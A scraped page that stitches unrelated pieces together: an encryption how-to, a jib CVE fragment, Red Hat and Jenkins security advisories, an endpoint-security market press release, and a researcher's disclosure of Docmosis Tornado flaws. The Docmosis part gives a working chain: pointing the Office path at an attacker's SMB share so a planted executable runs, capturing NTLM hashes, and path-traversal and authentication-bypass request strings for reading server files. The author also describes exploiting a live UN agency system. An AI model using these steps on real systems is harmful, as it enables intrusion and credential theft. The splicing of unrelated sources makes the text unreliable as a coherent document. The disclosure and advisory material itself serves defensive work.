Encrypting files, folders, and drives on your computer means that no one else can make sense of the data they contain without a particular decryption key—which in most cases is a password known only to you. 

So while someone could get at your files if they know your password (the decryption key), they won't be able to take out a drive from your system and access what's on it, or use a second computer to read your data—it'll all be gibberish. It means that if your Windows or macOS machine gets lost or stolen, you don't have to worry about someone using the data on it.

How the most popular operating systems have handled encryption has changed over the years, and there are third-party tools that give you more encryption options to choose from. We'll guide you through everything you need to know about these options to help you pick the right one.

Built-in Options for Windows

Device encryption is available in the Home versions of Windows.

Windows via David Nield

Encryption on Windows is a little more complicated than perhaps it should be. First of all, there are differences between the Windows Home and Windows Pro editions: Pro users get a powerful tool called BitLocker for encryption, but with the Home edition, there's a more basic alternative. It's simply referred to as device encryption, and you can find it by choosing **Privacy & security** and then **Device encryption** from the Settings panel in Windows.

Not so fast though, as this option won't appear for everyone: It requires a certain level of hardware security support from your desktop or laptop computer. It's all rather complex, and we don't have room to go into everything in detail here, but The Windows Club has an excellent explainer. If you search the Start menu for a tool called "system information," then right-click and run it as an administrator, you can see why your computer does or doesn't support this feature via the Device Encryption Support entry.

Assuming your hardware does meet all of the requirements, and the **Device encryption** entry is visible, you can click through it to see if your system drives are encrypted—they should be, by default, if you log in to your computer with a Microsoft account. It means that anyone who accesses your hard drives without that authorization won't be able to see the data on them, because it'll be encrypted and protected. If encryption isn't enabled for whatever reason, you can turn the toggle switch to **On**.

When it comes to external drives and USB sticks, if you have the Pro version of Windows you can use BitLocker: Just right-click on the drive in File Explorer, pick **Show more options** and **Turn on BitLocker**, and set a password. For those on the Home edition though, this option isn't available—you're going to have to use a third-party tool for the job of encrypting external drives, and we'll get on to those later on in this article.

Built-in Options for macOS

Use FileVault for maximum protection on a Mac.

Apple via David Nield

Encryption on macOS isn't quite as confusing as it is on Windows, but it still needs some explaining. If you have a Mac with a T2 security chip or Apple silicon inside (so one from late 2017 or later), then the contents of your system disk are encrypted by default. Your account password is required to get into the computer and at all of the data secured on the drive.

However, without getting into too much technical detail (which you can access here if you want to dive deeper), you can add an extra layer of encryption protection by enabling a tool called FileVault. Enabling FileVault means the information required to decrypt your Mac drive is harder to get at—if, for example, someone steals your computer and connects a second computer to it. Traditionally, this could impact speed and performance, but in recent years that's become less and less of a problem and is practically unnoticeable on the newest Macs.

You'll be asked to enable FileVault when you first set up macOS on a new machine, and it's something we'd recommend. You can also turn FileVault on (or off) whenever you like by opening the **Apple** menu and choosing **System Settings** then **Privacy & Security**. There's a FileVault option there, together with some details about what it does. You'll also need to specify your preferred way of unlocking the system disk if you ever forget your password, either through iCloud or through a dedicated recovery key.

You can encrypt external drives with a password from Finder: Just right-click on them and choose **Encrypt**. If the encryption option doesn't appear, the drive needs to be wiped and reformatted to be compatible—open the Disk Utility tool in macOS, click **View** and **Show All Devices**, then select the relevant external drive and click **Erase**. Give the drive a name, choose an encrypted option under **Format** (the options are explained here) and choose **GUID Partition Map** under **Scheme**. Pick your password, then click **Erase**, and the drive is ready to go.

Third-party Options for Windows and macOS

VeraCrypt makes it simple to encrypt an external drive.

VeraCrypt via David Nield

There are a variety of free and paid third-party encryption tools available if the options built into Windows and macOS don't suit your needs, including Cryptomator, NordLocker, and AxCrypt. However, we recommend one in particular, VeraCrypt: It's available for Windows and macOS (and indeed Linux,) it's not difficult to use, and it's free.

We also recommend reading through the online documentation that accompanies the program, but getting started is quite straightforward. Say you're encrypting an external drive, for example: With the drive plugged in and formatted, open VeraCrypt and choose **Create Volume**. Next, select **Encrypt a non-system partition/drive** and select **Next**. Select the drive you want to encrypt and follow the instructions on the screen.

During the configuration process, you'll be asked whether you want to encrypt the existing data already on the drive, or format it ready for files to be added—if you already have files on the drive that you don't want to be wiped, make sure you pick the former option. You'll also be asked to specify a password to lock the drive, which you should make sure you won't forget (you won't be able to access the drive without it).

VeraCrypt also lets you create containers, or sections of a drive that are encrypted. If you need to lock up specific files and folders without encrypting an entire disk for whatever reason, then this is one of the ways of going about it. From the main VeraCrypt screen, click **Create Volume**, then **Create an encrypted file container**. You'll be asked to specify a file on disk that then acts as the encrypted container for other files and folders.

How to Encrypt any File, Folder, or Drive on Your System

The package com.google.cloud.tools:jib-core before 0.22.0 are vulnerable to Remote Code Execution (RCE) via the isDockerInstalled function, due to attempting to execute input.



**Conversation**

\*

\* @return {@code true} if Docker is installed on the user's system and accessible

\*/

public static boolean isDefaultDockerInstalled() {

return isDockerInstalled(DEFAULT\_DOCKER\_CLIENT);

try {

new ProcessBuilder(DEFAULT\_DOCKER\_CLIENT.toString()).start();

\*

\* @return {@code true} if Docker is installed on the user's system and accessible

\*/

public static boolean isDefaultDockerInstalled() {

return isDockerInstalled(DEFAULT\_DOCKER\_CLIENT);

try {

new ProcessBuilder(DEFAULT\_DOCKER\_CLIENT.toString()).start();

This was referenced

Aug 25, 2022

 mpeddada1 marked this pull request as ready for review

Aug 25, 2022

CVE-2022-25914: Check if file exists when executable path is passed in through jib dockerClient.executable by mpeddada1 · Pull Request #3744 · GoogleContainerTools/jib

Red Hat Security Advisory 2024-1802-03 - An update for unbound is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1802.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:1802-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1802Issue date:         2024-04-15Revision:           03CVE Names:          CVE-2024-1488====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions,allowing any process outside the unbound group to modify the unbound runtimeconfiguration. The default combination of the \"control-use-cert: no\" option witheither explicit or implicit use of an IP address in the \"control-interface\"option could allow improper access. If a process can connect over localhost toport 8953, it can alter the configuration of unbound.service. This flaw allowsan unprivileged local process to manipulate a running instance, potentiallyaltering forwarders, allowing them to track all queries forwarded by the localresolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file\"/etc/unbound/conf.d/remote-control.conf\" has been added and included in themain unbound configuration file, \"unbound.conf\". The file contains twodirectives that should limit access to unbound.conf:    control-interface: \"/run/unbound/control\"    control-use-cert: \"yes\"For details about these directives, run \"man unbound.conf\".Updating to the version of unbound provided by this advisory should, in mostcases, address the vulnerability. To verify that your configuration is notvulnerable, use the \"unbound-control status | grep control\" command. If theoutput contains \"control(ssl)\" or \"control(namedpipe)\", your configuration isnot vulnerable. If the command output returns only \"control\", the configurationis vulnerable because it does not enforce access only to the unbound groupmembers. To fix your configuration, add the line \"include:/etc/unbound/conf.d/remote-control.conf\" to the end of the file\"/etc/unbound/unbound.conf\". If you use a custom\"/etc/unbound/conf.d/remote-control.conf\" file, add the new directives to thisfile. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1488References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2264183

Red Hat Security Advisory 2024-1802-03

DUBLIN, July 8, 2022 /PRNewswire/ -- The "Global Enterprise Endpoint Security Market - Forecasts from 2022 to 2027" report has been added to **ResearchAndMarkets.com's** offering.

Endpoint security is the technique of preventing harmful actors and campaigns from exploiting endpoints or entry points of end-user devices such as PCs, laptops, and mobile devices. Endpoint security solutions on a system or cloud protect against cybersecurity threats. Endpoint security has progressed beyond antivirus software to supply comprehensive security against sophisticated malware and new zero-day dangers.

Nation-states, hacktivists, organized crime, and purposeful and unintentional insider threats all pose a hazard to businesses of all sizes. Endpoint security is frequently referred to as cybersecurity's frontline, and it is one of the first places where businesses attempt to defend their networks. Due to several benefits, such as cost savings with cloud storage, compute scalability, and low maintenance requirements, enterprise use of SaaS-based or cloud-delivered endpoint security solutions continues to grow.

**The growing number of enterprise endpoints and mobile devices with access to sensitive data has created a tremendous need for endpoint security solutions, which is expected to drive the market.**

In today's environment, mobile gadgets such as smartphones and tablets have become necessary for both individuals and businesses. The number of employees using their phones for work is fast expanding, and mobile devices and applications have presented a slew of new attack vectors and data security challenges.

These cyber dangers range from Trojans and viruses to botnets and toolkits, and they can have a significant impact on the broader network, putting sensitive and private data at risk. For example, according to the Mobile Security Report 2021 by Check Point, 97 percent of businesses globally were hit by mobile attacks that used several attack vectors. At least one employee in 46 percent of those businesses downloaded a malicious app to their phone.

According to the same report, nearly every firm had at least one smartphone malware assault in 2020. The mobile network was responsible for 93 percent of the attacks. As previously stated, around 40% of all mobile devices are at risk of being targeted by cyber-attacks. As a result, businesses are increasingly implementing endpoint security solutions to secure their networks and give secure access to confidential data to their employees.

As a result, factors such as increased mobile and wireless device usage, advancements in connectivity infrastructure around the world, and dropping mobile device prices are all expected to have a significant impact on the endpoint security industry. For instance, according to Ericsson, there are already over six billion smartphone subscribers worldwide, with several hundred million more expected in the next years.

By 2026, the number of smartphone users is predicted to increase to 7516 million. Employees at firms are increasingly using their personal mobile devices to access corporate data owing to the growing BYOD trend. However, it poses security concerns, necessitating powerful endpoint security solutions to protect sensitive company data, resulting in significant demand.

However, the lack of awareness about endpoint security among the general public, as well as the fact that many enterprises are struggling to deal with security threats and data breaches as a result of a lack of understanding about endpoint security, is expected to limit the market expansion.

**By region, the Asia Pacific and North America are expected to hold a notable share in the global enterprise endpoint security market during the forecast period.**

North America and Asia-Pacific are predicted to have a significant share of the global enterprise endpoint security market. Applying technology to restrict threats on organizational endpoints and the rising penetration of mobile devices that are initially prone to endpoint attacks are two reasons supporting the market expansion in these regions.

For instance, in July 2021, SentinelOne and ConnectWise established a partnership to strengthen their security relationship. MSPs will be able to obtain SentinelOne Control and SentinelOne Complete as standalone products from ConnectWise rather than having to purchase them as part of the SOC-targeted Fortify Endpoint offering.

Similarly, in September 2020, Palo Alto Networks and OPSWAT expanded their partnership to add support for new endpoint platforms and IoT devices in GlobalProtect and Prisma Access for branch offices, retail locations, and mobile users. The integration detects and evaluates the state of the endpoint as well as any third-party security programs installed on it. The Host Information Profile (HIP) gathers data about the network's endpoints' security state, used to implement gateway policies.

**COVID-19 Insights**

The COVID-19 outbreak compelled enterprises all around the world to mobilize swiftly in order to secure large numbers of remote workers and expand their tooling beyond traditional security measures. With the growing number of cybercrimes in 2020, the market for global enterprise endpoint security has been positively impacted by the pandemic.

For instance, the US Department of Health and Human Services (HHS) systems were subjected to a large DDoS attack in March 2020. In the same month, a cyberattack hit databases at the University Hospital in Brno, one of the Czech Republic's main centers for COVID-19 blood testing. As a result, doctors could not complete coronavirus testing and had to postpone several surgical procedures.

**Key Topics Covered:**

**1\. INTRODUCTION**

**2\. RESEARCH METHODOLOGY**

**3\. EXECUTIVE SUMMARY**

**4\. MARKET DYNAMICS**  
4.1. Market Drivers  
4.2. Market Restraints  
4.3. Porter's Five Forces Analysis  
4.3.1. Bargaining Power of Suppliers  
4.3.2. Bargaining Powers of Buyers  
4.3.3. Threat of Substitutes  
4.3.4. Threat of New Entrants  
4.3.5. Competitive Rivalry in Industry  
4.4. Industry Value Chain Analysis

**5\. GLOBAL ENTERPRISE ENDPOINT SECURITY MARKET, BY SOLUTION**  
5.1. Anti-Virus  
5.2. Firewall  
5.3. Endpoint Device Control  
5.4. Anti-Spyware/Anti-Malware  
5.5. Others

**6\. GLOBAL ENTERPRISE ENDPOINT SECURITY MARKET, BY COMPONENT**  
6.1. Application Control  
6.2. Endpoint Encryption

**7\. GLOBAL ENTERPRISE ENDPOINT SECURITY MARKET, BY DEPLOYMENT**  
7.1. Cloud  
7.2. On-Premise

**8\. GLOBAL ENTERPRISE ENDPOINT SECURITY MARKET, BY ORGANIZATION SIZE**  
8.1. Small  
8.2. Medium  
8.3. Large

**9\. GLOBAL ENTERPRISE ENDPOINT SECURITY MARKET, BY INDUSTRY VERTICAL**  
9.1. BFSI  
9.2. Government  
9.3. Aerospace and Defense  
9.4. Healthcare  
9.5. Communication and Technology  
9.6. Others

**10\. GLOBAL ENTERPRISE ENDPOINT SECURITY MARKET, BY GEOGRAPHY**  
10.1. Introduction  
10.2. North America  
10.2.1. United States  
10.2.2. Canada  
10.2.3. Mexico  
10.3. South America  
10.3.1. Brazil  
10.3.2. Argentina  
10.3.3. Others  
10.4. Europe  
10.4.1. Germany  
10.4.2. France  
10.4.3. United Kingdom  
10.4.4. Spain  
10.4.5. Others  
10.5. Middle East and Africa  
10.5.1. Saudi Arabia  
10.5.2. Israel  
10.5.3. Others  
10.6. Asia Pacific  
10.6.1. China  
10.6.2. Japan  
10.6.3. South Korea  
10.6.4. India  
10.6.5. Thailand  
10.6.6. South Korea  
10.6.7. Taiwan  
10.6.8. Indonesia  
10.6.9. Others

**11\. COMPETITIVE ENVIRONMENT AND ANALYSIS**  
11.1. Major Players and Strategy Analysis  
11.2. Emerging Players and Market Lucrativeness  
11.3. Mergers, Acquisition, Agreements, and Collaborations  
11.4. Vendor Competitiveness Matrix

**12\. COMPANY PROFILES**  
12.1. Intel Corporation  
12.2. Broadcom Inc. (Symantec Corporation)  
12.3. Trend Micro Incorporated  
12.4. RSA Security LLC  
12.5. Kaspersky Lab  
12.6. Bitdefender  
12.7. WatchGuard Technologies  
12.8. ESET  
12.9. Sophos Ltd  
12.10. McAfee LLC

For more information about this report visit https://www.researchandmarkets.com/r/fyl26c

Worldwide Enterprise Endpoint Security Industry to 2027: Focus on Antivirus, Firewall, Endpoint Device Control, and Anti-Spyware/Anti-Malware

An issue was discovered in Docmosis Tornado prior to version 2.9.5. An authenticated attacker can change the Office directory setting pointing to an arbitrary remote network path. This triggers the execution of the soffice binary under the attackers control leading to arbitrary remote code execution (RCE).

Recently, I did a non-exhaustive security product review on a Document Generator Engine, named **Docmosis**. A system I targeted used **Docmosis Tornado** in its latest version **2.9.4**. I’ll give you a walkthrough based on my local lab installation with a Proof-of-Concept exploitation on an on-premises system belonging to a specialized agency of the United Nations.

By default, no login is needed to access the web UI :-0. But as we’ll see, even if the password protection is enabled/configured, there is an **Authentication Bypass** which makes all these findings exploitable from an **unauthenticated context** as well. But let’s go through all the findings step by step.

**Remote Code Execution**

This first vulnerability relies on the fact that the web UI field **“Open/Libre Office location”** can be changed, pointing to the _LibreOffice_ installation directory. All configuration changes are persisted after the corresponding _GWT-based_ HTTP POST request is sent to /webserverdownload/configure. The corresponding URL mapping can be found in the web descriptor web.xml.

    <servlet-mapping>
      <servlet-name>ConfigurationServlet</servlet-name>
      <url-pattern>/webserverdownload/configure</url-pattern>
    </servlet-mapping>
    ...
    <servlet>
      <servlet-name>ConfigurationServlet</servlet-name>
      <servlet-class>com.docmosis.webserver.server.ConfigurationServiceImpl</servlet-class>
    </servlet>
    

The responsible Java interface extends com.google.gwt.user.server.rpc.RemoteServiceServlet, finally leading to the implementing class com.docmosis.webserver.server.ConfigurationServiceImpl. The method com.docmosis.webserver.server.ConfigurationServiceImpl.saveConfiguration(ConfigBean) is called then with the parameters given in the request. There exists a validation method com.docmosis.webserver.server.ConfigurationServiceImpl.serverSideValidate(ConfigBean) which checks access to the Office location directory.

    String[] expectedFolders = DMProperties.getStringArray("docmosis.openoffice.location.binary.searchpath", ";");
    boolean subFolderFound = false;
    for (String expected : expectedFolders) {
      File subFolder = new File(officePathFile, expected);
      if (subFolder.canRead() && subFolder.isDirectory()) {
        subFolderFound = true;
        
        break;
      } 
    } 
    

The expectedFolders member seems to be used to check for expected folders matching a valid Office installation. The same is done for the Template directories etc. No further validations with respect to security are done. On a standard Windows installation, an **UNC network share path** could be used to point the Office directory to a remote host. The Office executable soffice.exe is used for converter functions etc. and therefore is observable in the process tree of Docmosis Tornado after being started.

Now, changing the **Open/Libre Office location** value to a remote network share path allows to load an **arbitrary malicious .exe file** named soffice.exe instead. After a restart of Docmosis Tornado, this would be fetched and executed, allowing an attacker to executing arbitrary code on the targeted machine. This already is a critical vulnerability in itself but **requires user interaction** on the server-side for the _restart_. **The web UI does not provide any restart functions**. Looking again at the GWT service implementation, we find the method com.docmosis.webserver.server.ConfigurationServiceImpl.restartServer() which indeed allows exactly this via a properly crafted GWT HTTP request. This makes the **user interaction restriction obsolete**. To following steps have to be taken to prove the Remote Code Execution (RCE).

*   We create a “malicious” soffice.exe file with a C cross compiler with the following code underneath.

    void main()
    {
    	system("cmd.exe /C calc");
    }
    

*   We mimick the directory/file structure of a valid LibreOffice installation on our remote attacker server.
    
*   We provide a fake SMB server with help of the impacket suite.
    
*   We change the Office location in the web UI pointing to this server \\10.137.0.16\myshare\LibreOffice.
    

*   We observe NTLM authentication on our fake SMB server.

*   We trigger the restart of the Tornado service and got code execution, i.e. our malicious soffice.exe got executed, popping a Windows calculator.

Since the targeted server uses NTLM authentication to login to the attacker’s fake SMB server, this could of course be used to capture the **NetNTLM hash**. This hash could be cracked offline, so finally an attacker would have had valid Windows credentials to access the server via other channels.

**Multiple Path Traversals - File Read**

In general, no proper validation of file system operations with respect to traversal attacks can be found. This allows various attack vectors leading to file disclosure out of the context directories specified within the Tornado application.

**Restricted File Read**

First, we show a file read primitive with a few restrictions for the attacker. The **“Source Templates From”** directory is set to C:\Users\user\Desktop\templates in our lab environment.

Using the function _“Creating dummy data based on template”_ in the web UI fills the _Data_ text field automatically so afterwards we can click the _Test_ button to create e.g. a PDF file. Next to our templates directory, mentioned above, we put a file with fake secret data C:\Users\user\Desktop\secretfolder\secret.txt. Now the request is intercepted and a path traversal payload injected into the template reference path.

Indeed, the generated document contains the content of the secret file: a file located at a completely different folder than C:\Users\user\Desktop\templates.

This seems at least be restricted to certain file types but nevertheless is a juicy vulnerability.

**Full File Read**

The most dangerous path traversal vulnerability originates from the service call to /fetch?filename=[SOME_NAME].pdf. This is called after we generated the PDF file above to automatically download the file content from the server.

The corresponding implementation can be found in com.docmosis.webserver.servlet.FetchTmp.doGet(HttpServletRequest, HttpServletResponse). The filename request parameter is used within a String concatenation to retrieve the file.

    filename = request.getParameter("filename");
    filename = System.getProperty("java.io.tmpdir") + "/" + filename;
    

This allows an attacker to again introduce relative path segments, giving access to arbitrary files on the server file system. Here, we show reading the file C:\Windows\win.ini.

**Authentication Bypass**

Even though, the default installation does not require an _Admin password_ being set, the web UI indeed provides a configuration field. To test this, we set a password, clicked the logout button and indeed are redirected to the login page.

Also our full file read vulnerability now cannot be exploited anymore from an unauthenticated content (_still exploitable as authenticated user, though_).

Looking at the web descriptor file web.xml reveals that an authentication filter is set in place for all URI paths.

    <filter-mapping>
    	<filter-name>AuthenticatedCheckFilter</filter-name>
    	<url-pattern>/*</url-pattern>
    </filter-mapping> 
    

Every request has to go through the Java Servlet filter com.docmosis.webserver.servlet.AuthenticatedCheckServlet.doFilter(ServletRequest, ServletResponse, FilterChain). Surprisingly, the authentication check can be bypassed to reach the final chain.doFilter(request, response) call. Responsible for this is the following code path:

    if (!authenticated) // [1]
    {
      if (!isRestCall) { // [2]
    
    
    
        
        WebServerPreferences prefs = WebServerPreferencesStore.getPrefs();
        boolean authenticationRequired = !StringUtilities.isEmpty(prefs.getAdminPassword());
        
        if (authenticationRequired) { // [3]
          
          if (isGWTRPCCall) {
            
            ((HttpServletResponse)response).sendError(401); return;
          } 
          if (!this.authPostUrl.equals(req.getRequestURI())) {
            
            RequestDispatcher rd = req.getRequestDispatcher("/authenticate.jsp");
            rd.forward(request, response);
    
            
            return;
          } 
        }
    } 
    

At \[1\], it is properly checked if the user is already authenticated. If not, the if branch is entered. If this request is not part of a REST call \[2\] and an Admin password is set \[3\], then access is denied. The problem now relies in the check if isRestCall is true/false.

    boolean isRestCall = req.getRequestURI().startsWith("/api/")
    

Our path traversal attack e.g. /fetch?filename=../../../../../Windows/win.ini indeed does not start with /api but at this point of HTTP request processing, a simple bypass is possible due to using the startsWith String method. Using an URI path with relative path segments like /api/../fetch?filename=../../../../../Windows/win.ini bypasses the authentication check and triggers the file read primitive again.

**Internet Exposure Check**

These findings were shared with the vendor and they released **version 2.9.5** to address these issues (I did not validate the patches, though). Checking the exposure rate of this software on the public Internet, one of the systems found was **\[REDACTED\].upu.int**. Even though, this instance was not using the latest version, the same vulnerabilities still worked fine.

As it turned out, this system belongs to the **Universal Postal Union (UPU)**, a specialized agency of the United Nations (UN). Additionally, this system seemed to be part of the official UPU network, i.e. no cloud-hosted instance but rather an entry point to the network of UPU.

The system exposed a web UI of Docmosis Tornado with default configurations, i.e. no authentication needed at all. Even if authentication would have been needed, we already found an **Authentication Bypass**.

To prove the system to be vulnerable, we read the content of C:\Windows\win.ini and provided the report as quickly as possible.

**Acknowledgements**

Many thanks to Carlos from UNICC to forward my requests to UPU quickly. Also the Docmosis team communicated fast and professionally.

P.S.: I’m pretty sure there’re more vulnerabilities in this product. Go, practice and responsibly disclose issues to the Docmosis team. Maybe you’ll find a deserialization vulnerability somewhere _\*hint\*_.

CVE-2023-25266: Using 0days to Protect the United Nations

Jenkins PaaSLane Estimate Plugin 1.0.4 and earlier does not mask PaaSLane authentication tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Analysis Model API Plugin
*   Deployment Dashboard Plugin
*   Dingding JSON Pusher Plugin
*   HTMLResource Plugin
*   Nexus Platform Plugin
*   OpenId Connect Authentication Plugin
*   PaaSLane Estimate Plugin
*   Scriptler Plugin

**Descriptions****DoS vulnerability in Analysis Model API Plugin**

**SECURITY-3327 / CVE-2023-5072**  
**Severity (CVSS):** Medium  
**Affected plugin: analysis-model-api**  
**Description:**

Analysis Model API Plugin 11.11.0 and earlier bundles versions of JSON-Java vulnerable to CVE-2023-5072.

This may allow attackers able to control input to cause a Denial of Service (DoS) by parsing a crafted JSON document.

As of publication, Synopsys Rapid Scan Static is the only plugin the Jenkins security team is aware of whose report parser is potentially affected.

Analysis Model API Plugin 11.13.0 updates JSON-Java to version 20231013, which is unaffected by this issue.

**Arbitrary file deletion vulnerability in Scriptler Plugin**

**SECURITY-3205 / CVE-2023-50764**  
**Severity (CVSS):** High  
**Affected plugin: scriptler**  
**Description:**

Scriptler Plugin 342.v6a\_89fd40f466 and earlier does not restrict a file name query parameter in an HTTP endpoint.

This allows attackers with Scriptler/Configure permission to delete arbitrary files on the Jenkins controller file system.

Scriptler Plugin 344.v5a\_ddb\_5f9e685 ensures that the file being deleted is located in the expected directory.

**Missing permission check in Scriptler Plugin**

**SECURITY-3206 / CVE-2023-50765**  
**Severity (CVSS):** Medium  
**Affected plugin: scriptler**  
**Description:**

Scriptler Plugin 342.v6a\_89fd40f466 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to read the contents of a Groovy script by knowing its ID.

Scriptler Plugin 344.v5a\_ddb\_5f9e685 requires the appropriate permission to read the contents of a Groovy script.

**CSRF vulnerability and missing permission checks in Nexus Platform Plugin allow XXE**

**SECURITY-3204 / CVE-2023-50766 (CSRF), CVE-2023-50767 (missing permission check)**  
**Severity (CVSS):** High  
**Affected plugin: nexus-jenkins-plugin**  
**Description:**

Nexus Platform Plugin 3.18.0-03 and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML.

Additionally, the plugin does not configure its XML parser to prevent XML external entity (XXE) attacks, so attackers can have Jenkins parse a crafted XML response that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Nexus Platform Plugin 3.18.1-01 configures its XML parser to prevent XML external entity (XXE) attacks.

Additionally, POST requests and Overall/Administer permission are required for the affected HTTP endpoints.

Nexus Platform Plugin is not currently distributed by the Jenkins Project due to licensing issues. The fixed version can be downloaded from the Sonatype website.

**CSRF vulnerability and missing permission checks in Nexus Platform Plugin allow capturing credentials**

**SECURITY-3203 / CVE-2023-50768 (CSRF), CVE-2023-50769 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: nexus-jenkins-plugin**  
**Description:**

Nexus Platform Plugin 3.18.0-03 and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Nexus Platform Plugin 3.18.1-01 requires POST requests and Overall/Administer permission for the affected form validation methods.

Nexus Platform Plugin is not currently distributed by the Jenkins Project due to licensing issues. The fixed version can be downloaded from the Sonatype website.

**Password stored in a recoverable format by OpenId Connect Authentication Plugin**

**SECURITY-3168 / CVE-2023-50770**  
**Severity (CVSS):** Medium  
**Affected plugin: oic-auth**  
**Description:**

OpenId Connect Authentication Plugin provides an anti-lockout feature, which allows administrators to define a local user account that can be used to recover access to Jenkins.

In OpenId Connect Authentication Plugin 2.6 and earlier the password to that account is stored in a recoverable format.

This allows attackers with access to the Jenkins controller file system to recover the plain text password of that account, likely gaining administrator access to Jenkins.

**Open redirect vulnerability in OpenId Connect Authentication Plugin**

**SECURITY-2979 / CVE-2023-50771**  
**Severity (CVSS):** Medium  
**Affected plugin: oic-auth**  
**Description:**

OpenId Connect Authentication Plugin 2.6 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins.

This allows attackers to perform phishing attacks by having users go to a Jenkins URL that will forward them to a different site after successful authentication.

**Tokens stored and displayed in plain text by Dingding JSON Pusher Plugin**

**SECURITY-3184 / CVE-2023-50772 (storage), CVE-2023-50773 (masking)**  
**Severity (CVSS):** Medium  
**Affected plugin: dingding-json-pusher**  
**Description:**

Dingding JSON Pusher Plugin 2.0 and earlier stores access tokens unencrypted in job config.xml files on the Jenkins controller as part of its configuration.

These tokens can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

Additionally, the job configuration form does not mask these tokens, increasing the potential for attackers to observe and capture them.

**CSRF vulnerability in HTMLResource Plugin allows deleting arbitrary files**

**SECURITY-3183 / CVE-2023-50774**  
**Severity (CVSS):** High  
**Affected plugin: htmlresource**  
**Description:**

HTMLResource Plugin 1.02 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to delete arbitrary files on the Jenkins controller file system.

**CSRF vulnerability in Deployment Dashboard Plugin**

**SECURITY-3092 / CVE-2023-50775**  
**Severity (CVSS):** Medium  
**Affected plugin: ec2-deployment-dashboard**  
**Description:**

Deployment Dashboard Plugin 1.0.10 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to copy jobs.

**Tokens stored and displayed in plain text by PaaSLane Estimate Plugin**

**SECURITY-3182 / CVE-2023-50776 (storage), CVE-2023-50777 (masking)**  
**Severity (CVSS):** Medium  
**Affected plugin: paaslane-estimate**  
**Description:**

PaaSLane Estimate Plugin 1.0.4 and earlier stores PaaSLane authentication tokens unencrypted in job config.xml files on the Jenkins controller as part of its configuration.

These tokens can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

Additionally, the job configuration form does not mask these tokens, increasing the potential for attackers to observe and capture them.

**CSRF vulnerability and missing permission checks in PaaSLane Estimate Plugin**

**SECURITY-3179 / CVE-2023-50778 (CSRF), CVE-2023-50779 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: paaslane-estimate**  
**Description:**

PaaSLane Estimate Plugin 1.0.4 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using an attacker-specified token.

Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Severity**

*   SECURITY-2979: Medium
*   SECURITY-3092: Medium
*   SECURITY-3168: Medium
*   SECURITY-3179: Medium
*   SECURITY-3182: Medium
*   SECURITY-3183: High
*   SECURITY-3184: Medium
*   SECURITY-3203: Medium
*   SECURITY-3204: High
*   SECURITY-3205: High
*   SECURITY-3206: Medium
*   SECURITY-3327: Medium

**Affected Versions**

*   **Analysis Model API Plugin** up to and including 11.11.0
*   **Deployment Dashboard Plugin** up to and including 1.0.10
*   **Dingding JSON Pusher Plugin** up to and including 2.0
*   **HTMLResource Plugin** up to and including 1.02
*   **Nexus Platform Plugin** up to and including 3.18.0-03
*   **OpenId Connect Authentication Plugin** up to and including 2.6
*   **PaaSLane Estimate Plugin** up to and including 1.0.4
*   **Scriptler Plugin** up to and including 342.v6a\_89fd40f466

**Fix**

*   **Analysis Model API Plugin** should be updated to version 11.13.0
*   **Nexus Platform Plugin** should be updated to version 3.18.1-01
*   **Scriptler Plugin** should be updated to version 344.v5a\_ddb\_5f9e685

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Deployment Dashboard Plugin
*   Dingding JSON Pusher Plugin
*   HTMLResource Plugin
*   OpenId Connect Authentication Plugin
*   PaaSLane Estimate Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Andrea Chiera, CloudBees, Inc.** for SECURITY-3179, SECURITY-3182, SECURITY-3183, SECURITY-3184, SECURITY-3203, SECURITY-3204, SECURITY-3205, SECURITY-3206
